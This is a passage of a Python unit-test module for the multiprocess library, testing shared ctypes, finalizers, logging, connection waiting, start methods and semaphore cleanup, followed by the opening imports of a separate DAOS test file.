(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
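# Illustrative sketch (not part of the original tests): util.Finalize, as
# exercised by _TestFinalize above, registers a callback that runs when the
# tracked object is garbage collected, when the finalizer is called
# explicitly, or at interpreter exit -- with higher exitpriority callbacks
# running first at exit.  The demo function is hypothetical and never
# called by the suite.
def _example_finalize(log=print):
    class Resource(object):
        pass
    res = Resource()
    finalizer = util.Finalize(res, log, args=('resource released',),
                              exitpriority=10)
    finalizer()        # runs the callback exactly once
    finalizer()        # later calls are no-ops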
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocess.' + m for m in modules]
modules.remove('multiprocess.__init__')
modules.append('multiprocess')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocess.popen_fork')
modules.remove('multiprocess.popen_forkserver')
modules.remove('multiprocess.popen_spawn_posix')
else:
modules.remove('multiprocess.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocess.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocess.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process(q):
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=_test_process, args=(queue,))
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocess.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocess.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocess.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocess.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocess.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
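# Illustrative sketch (not part of the original tests): the core behaviour
# behind TestWait -- multiprocess.connection.wait() blocks until at least
# one of the given connections/sockets/process sentinels is ready, or until
# the timeout expires, and returns the ready objects.  Hypothetical demo
# function, never called by the suite.
def _example_wait():
    from multiprocess.connection import wait
    r, w = multiprocessing.Pipe(duplex=False)
    assert wait([r], timeout=0.01) == []      # nothing to read yet
    w.send('ready')
    assert wait([r], timeout=5) == [r]        # readable once data arrives
    assert r.recv() == 'ready'
    r.close()
    w.close()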
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def _test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from multiprocess.tests import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
p.join(10)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def _test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
    # We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
p.join(timeout=5)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
p.join(timeout=5)
self.assertLessEqual(new_size, old_size)
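# Illustrative sketch (not part of the original tests): the after-fork
# registry that issue #17555 concerned is the same mechanism exposed by
# util.register_after_fork() -- a callback registered against an object is
# run (with that object) in the child after a fork.  Hypothetical demo
# function, never called by the suite; the callback only fires with the
# 'fork' start method.
def _example_register_after_fork():
    class State(object):
        forked = False
    state = State()
    util.register_after_fork(state, lambda obj: setattr(obj, 'forked', True))
    p = multiprocessing.Process(target=time.sleep, args=(0,))
    p.start()
    p.join()
    assert state.forked is False      # the parent's copy is never touched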
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
p.join(timeout=5)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x'*(1024*1024)) # sending 1 MB should block
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def _test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x'*(1024*1024))
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
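# Illustrative sketch (not part of the original tests): contexts give each
# start method its own namespace of Process/Pipe/Queue/etc., which is what
# TestStartMethod.check_context() verifies with a round trip through a
# child process.  The helper and demo function below are hypothetical and
# never called by the suite.
def _example_child_send(conn, value):
    conn.send(value)
    conn.close()
def _example_context_round_trip(method='spawn'):
    ctx = multiprocessing.get_context(method)
    r, w = ctx.Pipe(duplex=False)
    p = ctx.Process(target=_example_child_send, args=(w, method))
    p.start()
    w.close()
    assert r.recv() == method
    p.join()
    r.close()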
#
# Check that killing process does not leak named semaphores
#
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
import subprocess
cmd = '''if 1:
import multiprocess as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
        self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
#
# Mixins
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
t = 0.01
while len(multiprocessing.active_children()) > 1 and t < 5:
time.sleep(t)
t *= 2
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
print('Shared objects which still exist at manager shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
time.sleep(0.5)
multiprocessing.process._cleanup()
gc.collect()
tmp = set(multiprocessing.process._dangling) - set(dangling[0])
if tmp:
print('Dangling processes:', tmp, file=sys.stderr)
del tmp
tmp = set(threading._dangling) - set(dangling[1])
if tmp:
print('Dangling threads:', tmp, file=sys.stderr)
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
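# Illustrative sketch (not part of the original module): a start-method
# specific test module normally does nothing more than hand its own
# globals() to the hook above, the way CPython's test_multiprocessing_*
# files do.  The demo below is hypothetical and never called by the suite;
# it installs the generated classes into a throwaway namespace instead of a
# real module.
def _example_install(start_method='spawn'):
    namespace = {'__name__': 'example_multiprocess_tests'}
    install_tests_in_module_dict(namespace, start_method)
    # namespace now contains WithProcesses*/WithThreads*/WithManager* test
    # classes plus setUpModule/tearDownModule bound to the start method.
    return sorted(name for name in namespace if name.startswith('With'))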
|
online_extend.py
|
#!/usr/bin/python
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import time
import threading
from test_utils_pool import TestPool
from write_host_file import write_host_file
from daos_racer_utils import DaosRacerCommand
from dmg_utils import check_system_query_status
